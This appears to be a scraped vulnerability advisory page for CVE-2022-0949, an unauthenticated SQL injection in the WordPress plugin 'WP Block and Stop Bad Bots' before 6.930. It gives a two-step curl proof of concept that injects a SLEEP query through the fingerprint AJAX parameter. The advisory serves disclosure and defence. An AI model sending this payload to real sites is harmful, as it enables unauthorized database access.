Lucene search
CydaveWPVDB-ID:A0FBB79A-E160-49DF-9CF2-18AB64EA66CBHistoryMar 16, 2022 - 12:00 a.m.
WP Block and Stop Bad Bots < 6.930 - Unauthenticated SQLi
2022-03-1600:00:00
cydave
wpscan.com
13
0.04 Low
EPSS
Percentile
92.2%
The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection
PoC
curl -i ‘https://example.com/wp-admin/admin-ajax.php’ --data ‘action=stopbadbots_grava_fingerprint&fingerprint;=0’ -H ‘X-Real-IP: 1.1.1.36’ then curl -i ‘https://example.com/wp-admin/admin-ajax.php’ --data ‘action=stopbadbots_grava_fingerprint&fingerprint;=(SELECT SLEEP(5))’ -H ‘X-Real-IP: 1.1.1.36’
| CPE | Name | Operator | Version |
|---|---|---|---|
| stopbadbots | lt | 6.930 |
Related
cve
cve
CVE-2022-0949
2022-04-11 15:15:08
prion
prion
Sql injection
2022-04-11 15:15:00
nuclei
nuclei
WordPress Stop Bad Bots <6.930 - SQL Injection
2023-03-05 13:42:10
nvd
nvd
CVE-2022-0949
2022-04-11 15:15:08
patchstack
patchstack
wpexploit
wpexploit
WP Block and Stop Bad Bots < 6.930 - Unauthenticated SQLi
2022-03-16 00:00:00
cvelist
cvelist
CVE-2022-0949 WP Block and Stop Bad Bots < 6.930 - Unauthenticated SQLi
2022-04-11 14:40:59